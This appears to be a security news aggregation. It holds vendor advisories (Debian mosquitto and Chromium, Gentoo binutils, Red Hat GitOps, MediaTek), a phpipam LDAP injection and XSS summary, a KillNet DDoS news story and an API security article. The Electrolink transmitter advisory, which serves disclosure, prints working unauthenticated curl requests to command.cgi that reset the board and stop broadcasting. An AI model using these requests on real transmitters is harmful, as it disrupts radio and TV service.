Electrolink FM/DAB/TV Transmitter from a denial of service scenario. An unauthenticated attacker can reset the board as well as stop the transmitter operations by sending one GET request to the command.cgi gateway.

    Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoSVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The transmitter is suffering from a Denial of Service (DoS)scenario. An unauthenticated attacker can reset the board as wellas stop the transmitter operations by sending one GET request tothe command.cgi gateway.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5795Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php30.06.2023--C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)Success! OKC:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)Success! OKC:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)Success! OK

Electrolink FM/DAB/TV Transmitter Unauthenticated Remote Denial Of Service

Debian Linux Security Advisory 5511-1 - Several security vulnerabilities have been discovered in mosquitto, a MQTT compatible message broker, which may be abused for a denial of service attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5511-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 01, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : mosquitto  
CVE ID         : CVE-2021-34434 CVE-2023-0809 CVE-2023-3592 CVE-2023-28366  
                 CVE-2021-41039  
Debian Bug     : 993400 1001028

Several security vulnerabilities have been discovered in mosquitto, a MQTT  
compatible message broker, which may be abused for a denial of service attack.

CVE-2021-34434

    In Eclipse Mosquitto when using the dynamic security plugin, if the ability  
    for a client to make subscriptions on a topic is revoked when a durable  
    client is offline, then existing subscriptions for that client are not  
    revoked.

CVE-2023-0809

    Fix excessive memory being allocated based on malicious initial packets  
    that are not CONNECT packets.

CVE-2023-3592

    Fix memory leak when clients send v5 CONNECT packets with a will message  
    that contains invalid property types.

CVE-2023-28366

    The broker in Eclipse Mosquitto has a memory leak that can be abused  
    remotely when a client sends many QoS 2 messages with duplicate message  
    IDs, and fails to respond to PUBREC commands. This occurs because of  
    mishandling of EAGAIN from the libc send function.

Additionally CVE-2021-41039 has been fixed for Debian 11 "Bullseye".

CVE-2021-41039

    An MQTT v5 client connecting with a large number of user-property  
    properties could cause excessive CPU usage, leading to a loss of  
    performance and possible denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.0.11-1+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.0.11-1.2+deb12u1.

We recommend that you upgrade your mosquitto packages.

For the detailed security status of mosquitto please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/mosquitto

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmUZx+xfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTgyhAAwGXTLpeJ0n2FCmZdkhOJCz8qgD4nesLMKGnNH4bq0RWgunDe7CSagvMo  
YG83i4+S0xuH0BLL+5Ytu5Y4MTU9cMJXLaOYL0ivomtjQKilS4aoJQ9ps4bfZPff  
ChsFYi2IUB3VZlNaS8yLIh9Rm8630P51Te9jXTktMwvj8SDalt+HRchR2V5sAsK0  
G8fwSgAP4eIUb3xRWJNrHUXSRgiJpHIeWW8WIo9c0V7Tks/rIoYgXNQiQow1Hde5  
B6k8yHk2xwoXOMoTenY9xrrdY9HZuUqVe9qayl+AMREYmcNPmZvZDpMjUSxdOMdp  
JP/YD6nKp92DNlZG82k/45nWFLogAPQUC2SupaUrPQRJ99xDzlby4KkGt95rKMXE  
4tuc0sqR4EM2v9zhp9jmkIAVzQyBf3vVZNu5yyug0+7/jT/fwh/wFW3B3TTFYH4m  
lD3+9i1NPKt3hdBfZKryWDqmYV+86vvGLVPj5AzNF/JEj9wuFC5DzU44M09Qk2rO  
J0FWk0nKg6SznG5zY8k+L+tcpMYg+RoD/kJXZP+OuvSLUcnYw2NWYcW3sDccO/zI  
cVvIWDmnjei4D3VMkATnkHe7HCqO+bX4nvvytgPxj1WhZ17MIGqs7qRJbCEblDRd  
GZAIo0EWhmsZsEwRaXr7II/0qxOJ2EeXiFsbyYzWQCVOknmnzOI=  
=luvt  
-----END PGP SIGNATURE-----

Debian Security Advisory 5511-1

Gentoo Linux Security Advisory 202309-15 - Multiple vulnerabilities have been found in GNU Binutils, the worst of which could result in denial of service. Versions greater than or equal to 2.40 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: GNU Binutils: Multiple Vulnerabilities  
     Date: September 30, 2023  
     Bugs: #866713, #867937, #903893  
       ID: 202309-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in GNU Binutils, the worst of  
which could result in denial of service.

Background  
==========

The GNU Binutils are a collection of tools to create, modify and analyse  
binary files. Many of the files use BFD, the Binary File Descriptor  
library, to do low-level manipulation.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
sys-devel/binutils  < 2.40        >= 2.40

Description  
===========

Multiple vulnerabilities have been discovered in GNU Binutils. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GNU Binutils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-devel/binutils-2.40"

References  
==========

[ 1 ] CVE-2022-4285  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4285  
[ 2 ] CVE-2022-38126  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38126  
[ 3 ] CVE-2022-38127  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38127  
[ 4 ] CVE-2022-38128  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38128  
[ 5 ] CVE-2022-38533  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38533  
[ 6 ] CVE-2023-1579  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1579  
[ 7 ] CVE-2023-1972  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1972

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-15

Debian Linux Security Advisory 5508-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5508-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 29, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-5186 CVE-2023-5187 CVE-2023-5217Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 117.0.5938.132-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 117.0.5938.132-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUXDXcACgkQEMKTtsN8TjaQhhAAq9gEaLM0MplRerbQ0xg7lYNIiyCwlFBVM7VgHRIrE13c3T0twkB1JNOuv+5IVyej3L5AITp5VZsQSf1IcYVydf2ABEo/3qU3SEpAg/P/ZLR8ODQA/VGoUXiBRDSr2EwFFmNFNUCIbpea9OqBpxMCsCQkd7fTbcK4GpvSZby9ZnNkSu6o9ZBCoA1BqFsHElijcwvdx7x/+OLtFHT/2NDArgsDHt/1QvocsdxyXVHgbCZ3MVNo2uG1uWaNNsPzoOF5oMe732jTuAFs06/q3e7N7zOyBn13thxGEgSoUS9LA7Ow5kbAU7JGC24nbdEwb2iN69sGPt2N7C8VfPdZQeIpg2SV+3ZOKqKSRdozgUZA52+WEhwqV2TNDlrdcCRqfmW/aRQEEvogs9NolejtkajTR3th99aN0KKDqHR66Syzb7SNggOoXpH8bCi83WvoZKHPh1UjJeaVDDBb3RyioTg9HUfddDicxJoYFmAwSjVuD4LR6leW/q0zP+aUeCBUXVVIU2XMSmiegrrnzAF+oNGVpj2ATn4ecoB+N/6sS9Hg+0FdpoeY9nB1PIRkccP0sURvabZBoyExknsQPdLb3GxmvOXBRmM2Gbup76HrSNmkmgGXbsUEfeUBmPwsqiEceUn4yVSkIv/2LDHZN5hWk9MO+u3qnaT4xiXS5Y2vq6KP89M==nMGQ-----END PGP SIGNATURE-----

Debian Security Advisory 5508-1

Red Hat Security Advisory 2023-5407-01 - OpenShift GitOps KAM OpenShift GitOps Kubernetes Application Manager CLI tool. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: openshift-gitops-kam security update  
Advisory ID:       RHSA-2023:5407-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5407  
Issue date:        2023-09-29  
CVE Names:         CVE-2023-37788   
=====================================================================

1. Summary:

An update for openshift-gitops-kam is now available for Red Hat OpenShift  
GitOps 1.10.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift GitOps 1.10 - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenShift GitOps KAM OpenShift GitOps Kubernetes Application Manager CLI  
tool

Security Fix(es):

* goproxy: Denial of service (DoS) via unspecified vectors (CVE-2023-37788)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2224245 - CVE-2023-37788 goproxy: Denial of service (DoS) via unspecified vectors.

6. Package List:

Red Hat OpenShift GitOps 1.10:

Source:  
openshift-gitops-kam-1.10.0-34.el8.src.rpm

aarch64:  
openshift-gitops-kam-1.10.0-34.el8.aarch64.rpm

ppc64le:  
openshift-gitops-kam-1.10.0-34.el8.ppc64le.rpm

s390x:  
openshift-gitops-kam-1.10.0-34.el8.s390x.rpm

x86_64:  
openshift-gitops-kam-1.10.0-34.el8.x86_64.rpm  
openshift-gitops-kam-redistributable-1.10.0-34.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37788  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlFuy1AAoJENzjgjWX9erEvhoQAI+QWAbrWYwyWNRZfp0Fz+gm  
M31rUJk5OcQo11qtDFQRHGsif+pg8YY5dPkKGFLWuAz9JGDy+TT2wh7DLltDOnR8  
diK3a+5jNMReNreloWEE9VbKW1G7xVck23lGBhqIx+SsOgGh/SBZTrv6UqTRGMCY  
X6Pczpshso3Bmdt3KA2ud3NVH7GNoZkB2CEVa4PAKmSyYC6SFIzvg+DS8kGKW0KF  
VkU/RAQlsJaT8PdRW3MfvA/kSaTMPXi99wzoy8IEA1jibbC7R9YvlxiAlNGx3ace  
ceH9As7xxPdatETvkaypPY9GzLwNqfu3ZXbZXlwowLjISYUu0ibkjCBNRIBcYjWw  
AZB3gsyTdUPWKXkU4NQ/UGRM5XE8aISC/439/SRonC2n9VWoVDov0x3gsygOWU7B  
TFzwH/qCe+oOIqCOqeXDUgsFbdT4gH7QIM0HY1JSmBcjstgY278pBKW2y4srJbSU  
AJngdfAYsIhtJVaQLoWh9KAoWgWi+lWA0tnopRqOgBItqRncVw2UCZyXc5+XZQKM  
42/+1uW7yAOfee+wRSjRDIZv5+88jks/v+UWIuljttl7+YtqggT37iXS8AQXDv+r  
SVeRxtkrQ7oKuMzQYGPm7s/mIp90krBzwiubNNtHDT61/A8VJCXDbghkqJHu8q5n  
JSVAxTYv7hbTygR3Z+V7  
=juqU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5407-01

Phpipam before v1.5.2 was discovered to contain a LDAP injection vulnerability via the dname parameter at /users/ad-search-result.php. This vulnerability allows attackers to enumerate arbitrary fields in the LDAP server and access sensitive data via a crafted POST request.

**phpipam-exploit**

Affected versions: <1.5.2

**LDAP injection in /app/admin/users/ad-search-result.php**

LDAP injection is similar to SQL injection, but a lot less well known. Because the user can fully control the POST\['dname'\] variable, the query can be altered in $adldap->user()->info() as the adLDAP library itself does not take care of sanitization. This can be used by an authenticated attacker to enumerate arbitrary fields in the LDAP server (which may contain sensitive data like passwords, social security numbers, etc inserted by other applications). Even the phpipam admin should not have access to this information, only to the fields that need to be shown when searching for LDAP users at new user creation. LDAP injection can also be leveraged to Denial of Service.

 

**Stored Cross-Site Scripting in /app/admin/users/ad-search-result.php**

The LDAP server may return strings containing special HTML characters, which means that if a user can edit one of the LDAP fields that is printed by phpipam using another application interacting with the same LDAP server (which is a realistic scenario, there is no reason to store escaped characters in a database, the good practice approach is to escape them when printing, not when inserting), a javascript payload can be placed such that it is executed with administrator privileges as soon as the user appears in the search results of a search an administrator executes. I created a PoC to add another administrator user with known credentials, the payload is injected in the email field of the LDAP server (other fields are possible too)

CVE-2023-41580: GitHub - ehtec/phpipam-exploit

By Waqas
The DDoS attack took place around 10 a.m. local time.
This is a post from HackRead.com Read the original post: UK Royal Family Website Hit by DDoS Attack from KillNet

As of the time of writing, the UK Royal Family website that was targeted has been restored and is accessible to visitors.

The official website of the UK’s royal family, Royal.uk, was struck by a distributed denial of service attack (DDoS attack) on Sunday, causing the site to go offline for approximately 1.5 hours. The attack took place around 10 a.m. local time.

According to reports, the Royal.uk website was swiftly restored to full functionality following the attack. However, as a precautionary measure, Cloudflare checks were implemented at the time of writing to prevent automated bots and ensure the security of IP addresses attempting to access the site.

According to reports, KillMilk, the leader of the Russian hacking group Killnet, apparently claimed responsibility for the DDoS attack on Telegram Messenger. It’s worth noting that these claims, while attention-grabbing, have yet to be officially verified, as the official KillNet account has remained conspicuously silent regarding the attack. The group’s last communication on Telegram was posted on September 18, 2023, leaving room for speculation.

****What Happens in a DDoS Attack?****

In a DDoS attack, multiple compromised computers or devices are used to flood a target server or network with an overwhelming amount of traffic. This flood of traffic disrupts the target’s ability to respond to legitimate requests, effectively rendering the target’s online services inaccessible to users.

The goal of a DDoS attack is to overwhelm the target’s resources and cause downtime, inconvenience, or financial losses. It is often used as a tactic by cybercriminals or hacktivists to disrupt websites or online services.

In a comment to Hackread.com, Oseloka Obiora, CTO of London, England-based cybersecurity firm RiverSafe stressed that “Whether you are a prince of pauper, cybercriminals are coming for you and this incident is another reminder of the dangers posed by sophisticated online attacks.”

“Moving forward, organisations of all shapes and sizes need to urgently update their cyber defences, both in terms of skills and software, to prevent malicious hackers from achieving their insidious objectives,” he added.

KillNet has previously gained notoriety for its involvement in a range of high-profile cyberattacks. In one instance, they allegedly hacked into NATO systems and purportedly created fake profiles using stolen NATO login credentials on a gay dating website, raising concerns about the potential misuse of sensitive data.

In December 2022, Killnet exposed a text file containing the login credentials of 10,000 individuals, whom they claimed to be FBI agents. This incident added a new layer of complexity to their notoriety in the world of cyber warfare.

The hacking group is also infamous for its DDoS attacks on Lithuanian websites. These relentless and widespread cyberattacks eventually led the online hacktivist group Anonymous to declare a cyber war against KillNet, emphasizing the scale and impact of their digital operations.

The latest attack on the UK royal family’s website exposes the ever-present threat to online platforms, irrespective of their prominence or the security measures in place.

UK Royal Family Website Hit by DDoS Attack from KillNet

Introduction
In today's interconnected digital ecosystem, Application Programming Interfaces (APIs) play a pivotal role in enabling seamless communication and data exchange between various software applications and systems. APIs act as bridges, facilitating the sharing of information and functionalities. However, as the use of APIs continues to rise, they have become an increasingly attractive

****Introduction****

In today's interconnected digital ecosystem, Application Programming Interfaces (APIs) play a pivotal role in enabling seamless communication and data exchange between various software applications and systems. APIs act as bridges, facilitating the sharing of information and functionalities. However, as the use of APIs continues to rise, they have become an increasingly attractive target for cybercriminals and a significant cybersecurity risk across various industries. This article dives into the world of APIs, exploring why they pose substantial cybersecurity challenges and providing real-world examples of API breaches across different sectors.

Download **API Security Guide**.

****The API Revolution****

The proliferation of cloud computing, mobile apps, and the Internet of Things (IoT) has accelerated the adoption of APIs. They serve as the building blocks of modern software applications, enabling developers to integrate third-party services, enhance functionalities, and create innovative solutions rapidly. From extended healthcare services to e-commerce, APIs have become an integral part of our digital lives.

****Why APIs are a Cybersecurity Risk****

On the API side, the top-ranked vulnerability cited by the Open Web Application Security Project (OWASP) is now BOLA, or broken object-level authorization. This flaw can allow attackers to manipulate the ID of an object in an API request, in effect letting unprivileged users read or delete another user's data. This is a particularly high-risk attack, given that it doesn't require any degree of technical skill to execute, and intrusions resemble normal traffic to most security systems.

Detection logic must differentiate between 1-to-1 connections and 1-to-many connections among resources and users. Post-event BOLA attacks are difficult to see because of their low volume, and it does not show a strong indication of any behavioral anomalies, such as injection or denial of service.

2023 reports indicate cyberattacks targeting APIs have jumped 137%, with healthcare and manufacturing seen as prime targets by attackers. Attackers are especially interested in the recent influx of new devices under the Internet of Medical Things and associated apps and API ecosystem that has supported the provision of more accessible patient care and services. Another industry that is also vulnerable is manufacturing, which has experienced an increase in IoT devices and systems, leading to a 76% increase in media attacks in 2022.

However, according to a recent State of API Security 2023 report, the following are security teams' top list of API security concerns:

*   **Zombie APIs** \- Old, deprecated APIs known as Zombie APIs appeared at the top of the list of API security concerns in many 2023 reports
*   **DDoS** \- Denial of service (DDoS) attacks to overwhelm website, server, or network
*   **Authentication Bypass** - Account takeover/misuse
*   **Data Leakage** - Accidental exposure of sensitive data
*   **Data exfiltration – Unintentional exposure of data that is deliberately stolen**
*   **Shadow APIs** - Undocumented "backdoor" APIs (e.g., unknown or shadow APIs)

****The Proliferation of APIs Across Industries****

The explosion of APIs across industries has been driven by their unparalleled ability to enhance connectivity, streamline operations, and enable innovation. Organizations are leveraging APIs to achieve interoperability, accelerate development cycles, and offer enhanced user experiences. From e-commerce platforms integrating payment gateways to healthcare systems sharing patient data securely, APIs enable organizations to harness the strengths of specialized services and technologies without having to reinvent the wheel.

The modularity and extensibility offered by APIs empower developers to build upon existing functionalities, rapidly create new applications, and adapt to evolving market demands. As industries continue to embrace digital transformation, APIs play a pivotal role in driving efficiency, agility, and competitiveness, fostering a dynamic ecosystem of interconnected technologies.

Here are a few examples of how major industries are using APIs and the risks associated with not securing APIs appropriately.

****Healthcare****

Healthcare institutions are increasingly harnessing the power of APIs to revolutionize patient care and enhance operational efficiency. APIs are serving as a conduit for seamless data exchange among various healthcare systems, enabling interoperability between electronic health records (EHR) platforms, medical devices, and patient portals. These APIs facilitate secure and standardized sharing of patient information, allowing healthcare professionals to access crucial data at the point of care.

Moreover, APIs are driving innovation in telemedicine and remote patient monitoring by enabling real-time communication between patients and medical practitioners through mobile apps and wearables. By leveraging APIs, healthcare institutions are not only optimizing clinical workflows and reducing administrative burdens but also improving patient engagement and outcomes. The use of APIs in healthcare is fostering a more connected and data-driven ecosystem, ultimately transforming the way healthcare services are delivered and experienced.

Some research states that the lack of security APIs may cause $12 billion to $23 billion in average annual API-related cyber loss in the US and anywhere from $41 billion to $75 billion globally.

While APIs offer significant benefits to the healthcare industry, they also introduce potential risks. Inadequate security controls in API implementations can lead to unauthorized access to sensitive patient data, exposing individuals to privacy breaches and identity theft. To mitigate these risks, healthcare institutions must prioritize robust API security measures, including encryption, strong authentication, regular vulnerability assessments, and compliance with industry regulations such as HIPAA.

**Quest Diagnostics API Breach**: A third-party API was the result of one of the largest data breaches experienced by a leading clinical laboratory service provider in the United States, Quest Diagnostics. Attackers exploited a vulnerability in this third-party's web payment page, which was accessible through an exposed API gaining unauthorized access to medical information of approximately 11.9 million patients.

****Financial Service Institutions****

Financial institutions are leveraging APIs to revolutionize their services and customer experiences. APIs have become the backbone of modern financial systems, enabling seamless integration between various banking functions, third-party applications, and digital services. With APIs, these institutions can offer customers real-time access to account information, transaction histories, and personalized financial insights. APIs also facilitate secure payment processing, enabling the integration of mobile wallets and third-party payment gateways.

Moreover, financial institutions are embracing Open Banking initiatives, allowing customers to securely share their financial data with authorized third-party applications through standardized APIs. This approach fosters innovation by enabling fintech companies to develop tailored solutions such as budgeting apps, investment platforms, and lending services. Through APIs, financial institutions are not only improving operational efficiency but also transforming the way customers interact with and manage their financial affairs, creating a more dynamic and interconnected financial landscape.

API attackers targeting financial services and insurance APIs are increasingly active, with a reported 244% increase in unique attacks in 2022. In addition, many financial institutions have experienced a significant security issue in production APIs over the past year, and nearly one out of five have suffered an API security breach.

Due to this, on October 3, 2022, the FFIEC announced a significant update to its 2018 Cybersecurity Resource Guide for Financial Institutions. Adding API Security as an important component of an organization's inventory of information systems and risk management initiatives.This is a major development toward the eventual regulatory mandates, including API security.

**Latitude Financial API Breach:** The Melbourne-based company, which provides personal loans and credit cards in Australia, suffered a major breach that occurred in March 2023, with more than 14 million records being compromised. Almost 8 million drivers' licenses were stolen, along with 53,000 passport numbers and dozens of monthly financial statements. The most concerning aspect of the breach is that Latitude Financial originally reported that only 300,000 people were affected, suggesting a lack of understanding of the attack.

****Technology****

Tech companies are at the forefront of leveraging APIs to create innovative and interconnected solutions that drive the digital economy. These companies utilize APIs for a multitude of purposes, including improving and enhancing user experiences, expanding product functionalities, and collaborating with external developers. This rapid development and integration of APIs can lead to security oversights.

Tech companies often manage numerous APIs from various sources and ensuring consistent security practices across all of them can be challenging. An oversight in one API could open the door to vulnerabilities that attackers could exploit to compromise the broader network. For example, the integration of third-party APIs can expose tech companies to risks beyond their control. If a third-party API is compromised, it can impact the security of the integrated application, as seen in the 2018 Facebook breach, where a third-party app's vulnerability exposed user data.

However, the increasing reliance on APIs poses significant cyber risks to tech companies since APIs often transmit sensitive information between systems. Any vulnerabilities in API security could be exploited to gain unauthorized access to user data or company databases, and inadequate authentication and authorization mechanisms can expose APIs to attacks like unauthorized data retrieval or manipulation.

**Dropbox API Breach:** On November 1, 2022, hackers were able to gain access to Dropbox's GitHub internal code repositories. This allowed hackers to access 130 internal code repositories, some containing API keys and user data. Hackers sent an email emulating CircleCI, a popular pipeline for CI/CD, for their phishing attack. Users were then taken to a counterfeit CircleCI page, where they were prompted to input their GitHub credentials. They were then sent a One-Time Password, which they were asked to input.

Fortunately, it seems no user data was accessed in the DropBox API breach. The hackers were restricted to downloading GitHub's code repositories, which is bad news for them but better news for DropBox users.

****Retail****

Retailers today do more than half of their business online and have embraced the use of APIs to revolutionize their operations and deliver enhanced customer buying experiences. This industry leverages APIs to seamlessly connect their online and in-store systems, integrate third-party services, and optimize various aspects of their business processes. For retail companies, APIs facilitate real-time inventory management across multiple locations, enabling customers to check product availability online before visiting a physical store. Additionally, APIs power personalized recommendations, enabling retailers to suggest products based on customer preferences and browsing history, thereby enhancing cross-selling and upselling opportunities.

In most retail sectors today, APIs play a vital role in streamlining the ordering and delivery processes. Mobile apps and websites often integrate with point-of-sale systems through APIs, enabling customers to place orders remotely and receive accurate updates on their orders' status. Third-party integrations, although enhancing functionality, introduce an additional layer of risk if APIs connecting with third-party services are exposed.

**Peleton API Breach**: In May 2021, a security researcher found that he could make unauthenticated requests to Peloton back-end APIs that were used by related exercise equipment and subscription services. One could call the Peloton API endpoints directly and obtain significant amounts of PII, resulting in privacy impacts for Peloton customers. Peloton web and mobile applications created as companions to Peloton exercise equipment used these back-end APIs to provide workout statistics and class scheduling. Peloton ultimately remedied the API issues, but it's unclear how many Peloton customers may have had their personal information disclosed.

****Conclusion****

APIs have transformed the way software applications interact and function, offering efficiency and innovation across industries. However, their widespread use has also introduced new and complex cybersecurity challenges. The potential for unauthorized data access, disruption of services, and compromise of entire systems makes APIs a prime target for cybercriminals. As seen from the examples above, inadequate API security controls can lead to significant breaches with far-reaching consequences.

To mitigate the risks posed by APIs, organizations must prioritize robust security measures. This includes implementing strong authentication and authorization mechanisms, regularly updating and patching APIs, encrypting sensitive data during transit and conducting thorough security assessments, such as penetration testing and code reviews. Furthermore, organizations should establish comprehensive security protocols for integrating third-party APIs and ensure ongoing monitoring to detect and respond to potential threats.

****Best Practices and Mitigation****

BreachLock recommends that organizations seriously consider updating their API security practices, that should include the following:

1.  **Attack Surface Management** - API discovery and inventory through Attack Surface Management scanning for both internal and external-facing attack surfaces
2.  **API Penetration Testing Services** – Regular API security assessments to identify vulnerabilities through hybrid penetration testing, using both automated and manual technologies
3.  **Continued Automated Testing** - API threat prevention through continued automated security validation to ensure security controls are effective and new vulnerabilities have not emerged

If trends continue, new API exploits will be experienced more frequently. At BreachLock, we believe API security should be a significant cyber initiative for all organizations to ensure that your security ecosystem can defend against these types of sophisticated and growing attacks.

****About BreachLock****

BreachLock is a global leader in PTaaS and **penetration testing service**. BreachLock offers automated, AI-enabled, and human-delivered solutions in one integrated platform based on a standardized built-in framework that enables consistent and regular benchmarks of attack techniques, security controls, and processes. By creating a standardized framework, BreachLock can deliver enhanced predictability, consistency, and accurate results in real-time every time.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APIs: Unveiling the Silent Killer of Cyber Security Risk Across Industries

In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03802522; Issue ID: DTV03802522.

**October 2023 Product Security Bulletin**

Published 2023-10-02

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT, Wi-Fi, TV and Audio chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2023-20819, CVE-2023-32819, CVE-2023-32820

Medium

